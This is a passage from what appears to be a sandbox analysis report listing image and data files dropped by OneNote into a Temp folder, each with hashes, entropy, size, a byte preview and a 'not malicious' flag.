                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                  C:\Users\user\AppData\Local\Temp\{92407984-87DF-4CFD-A27A-FE5AC5EFF312}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):95763
                                                                                                  Entropy (8bit):7.931689087616878
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:EoES7mhTyzabUaE77xAOmq0zVruQlttNxlipxVWssMU2YhRy2v6pKKYhQzwMc2:zz7mhTyzabUa4b4xuQlttnlGx8x9h02M
                                                                                                  MD5:177DD42CA99CAA2CCBF2974221680334
                                                                                                  SHA1:35FD86B3DD082A6D4930C67BC0E05D3B5817465A
                                                                                                  SHA-256:525A857D0EDA855A64D3619DF58B1C2D013A73E60FA0D49B155ECFCB2C134C7C
                                                                                                  SHA-512:6FB6D9A6C97B1115C3246690A2F339CD612899AC25ACBA00296EAEAA0A1D094E7339D670969764FE23EB7C08FCDD01C6F78FBC0735D504D5E02AD342901719B3
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!..1AQa...q......."...2..B#Rb3..r$...6..C4....Ss%5...tu.c..Dd.EU7....................!.1.AQ..aq......"r..2...4Rb#3$B.Ss............?..H..dV....U..-..0]Cp.%O.Z.Y.e.=/.q.....j76.w@s...5.&&&5...n..w..>.1....;.vR..[.......=.......KtY]u3.g18...).r....&.IZ'.....g..4kY..X..b.......y<...r1........e.._...X...w....op.m%Jr31...S.Vo.._....OI\]....F..V-....\...2j..X.....y.p.$4.....&#..]..n.V..x..P...F..C.f....])..~..Z\.....,..#..v..v...2V.k.SuaydO../[.*c._..oTV<Z.s.[...o.x..>....-....v...#....-.X..L.Z./#.XG.-.0......%w..H.@aZ....C.}...N~.;..R......5.D......I.... .R........s.>..ks....(...S...9....2=. :^.. p.+?(....$..Q..I.........=|..`2. v..t......U*.8.u.. ...'...*...2;u....& 3..$.

                                                                                                  C:\Users\user\AppData\Local\Temp\{9258658D-3015-401F-8193-26ABA753081E}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4081
                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                  C:\Users\user\AppData\Local\Temp\{9548C66A-D02A-47B2-9F4F-730D2B315557}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                  C:\Users\user\AppData\Local\Temp\{973206EC-E218-4190-952D-689BDE79B46B}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4490
                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                  C:\Users\user\AppData\Local\Temp\{97F0310C-B211-43AE-A19A-07FBCC05D5D2}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):179460
                                                                                                  Entropy (8bit):7.979020171518325
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:oiKXvL7lv0am/R1vrdH+9dK6zPQ6bbnGDpcGGDNMIOIMAT8q9Vc02Q57S4A+vMFz:+vlvC/HvgA6fGqGGJlO1qZ71W6CzDn
                                                                                                  MD5:4E131DBFEC5C2462273CA7B35675B9D9
                                                                                                  SHA1:CA037F444D819A118AC37D7AA3782B9BF94C1616
                                                                                                  SHA-256:2A4A3530D652E227DDD5ADC096A95F6034718F7C380B07DB622022D768815059
                                                                                                  SHA-512:C333ECEB1439D0238BF44FB7896E62DBA4C645B70413AA0F99C1F10E8DCD20C2EEE5C83F2E9DDE9A2494C85A6D8D13CFFFC4160E2F598E17867015F5244D656A
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1AQ.aq...".....2Rr..Bb..#34.....CSs.$5c.t....%.Dd.6.T..u.U....E.7w........................!.1A.Qaq......2."r.3....BRb.#4......CsSc...$.5..%.DT.t67d..Uu...'............?..c.......p..z..i.....z......kj........F>f......3N...M....RM.&..-.~.Q..'.....q.a..w...-~......g.{..&.......V.n.D....>FS!n.....@..)...W..q..Wr{..J.gf.{.M$.P@m.,..9..&m.D...w.._...-.O........s.....h.k~......(.K...V..l.-...+.9.k......*......#.p#.O..9M..mF...C.......7+.AI....4vw.;..H......e..Q.u[.eUK.....z.....[.Kt...s..Lf.4..l{.....sh.............=..;..iqkj.m.a...NH......v..H..$..q.y......c...U[Mcf.......+...S-...^....4..T..YtL.x.v.;.....<...Ik|B.$.s8......3.+.8.l.. h.:....%B..W..I.QRS..,*x.

                                                                                                  C:\Users\user\AppData\Local\Temp\{988885FB-E2F7-49A8-AC53-EA232B88FDC1}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13737
                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                  C:\Users\user\AppData\Local\Temp\{99317E9B-0A27-48DA-9095-96C9C619F252}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19235
                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                  C:\Users\user\AppData\Local\Temp\{99E38EF3-DF5E-46C8-A0D5-F368537AC552}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2332
                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                  C:\Users\user\AppData\Local\Temp\{9A73228A-01D5-4841-A800-C4E65CAAC5D6}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Temp\{9BE785C7-CFC2-4955-8A26-122FC342AE32}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Temp\{9CC27FA9-96AC-42F7-AC51-082E0DF91DDE}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4744
                                                                                                  Entropy (8bit):0.6476629456720718
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:RaIzYyfB3h1RRXUnf30UY/zfszXjoOHKXU6bRujlw//0lweI/DBRujd:RaIzYyf9/Uf3tyMjoOLWf/o
                                                                                                  MD5:7734F01C1254FD15BE7A974272ED63FC
                                                                                                  SHA1:96EA7A4F8DBB6B5821D7CE9284D584874212312A
                                                                                                  SHA-256:647CCD72B757D7F81D3532410674D5387448ADA699B69E33DCDE82A525D0BD07
                                                                                                  SHA-512:A766111D3A8D259EBFA339C4E1B4C20472AEEFF5CCE855ECE66ACBD395E8F7C4F68EED46BB0F788FDF1638CADEF2F529E2DBFD615A1369F5F9A63F4B3F10D17E
                                                                                                  Malicious:false
                                                                                                  Preview:./.C..vL....W"v_La...E.I..9.[..h................?.....I...............................................................................................................h...........................................O.%v..G..H1...9.........^..."DK..o.@.G5.............................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\{9CD03FAD-2423-4801-BE6C-957A5BBDC9E4}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4744
                                                                                                  Entropy (8bit):0.7008377229218099
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:AjnTYyfh3h1bQ9XUnfHvke+fXjoOHKZf/I/YRuj8lvClax/+q/ARujd:yTYyfdMUfHvke+fXjoOGAQV/x/B5
                                                                                                  MD5:996A1CDE677F2510E222E95ECD572EB5
                                                                                                  SHA1:D6E3E8A8363AB640C8A164D7D00184A398DB2DA5
                                                                                                  SHA-256:8A230FC2F84CB985875AD421DF8E993BC80D9A64C57A7CF8BC52776E4C8ABCF8
                                                                                                  SHA-512:45D598623D5DDF0359C9F181005BFA80DD333B5B7A77D645CA5254FA3BB83403A22E533FAE669A4B3938BC0FE59ADF34B4D458E3E6AAA1FBDAEBC0445DB6C042
                                                                                                  Malicious:false
                                                                                                  Preview:.R\{..M..Sx.)..7....F...k...................?.....I.......*...*...*...*...................................................La...E.I..9.[..h0.......................h.............................................o\~D.E..^..I..........YK.p.nYI....q.3=.............................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\{9E18061D-6145-4558-8B33-793E62998F96}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11449
                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                  C:\Users\user\AppData\Local\Temp\{9E313FAC-3CA3-4696-8A92-4578AD10A71E}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16003
                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
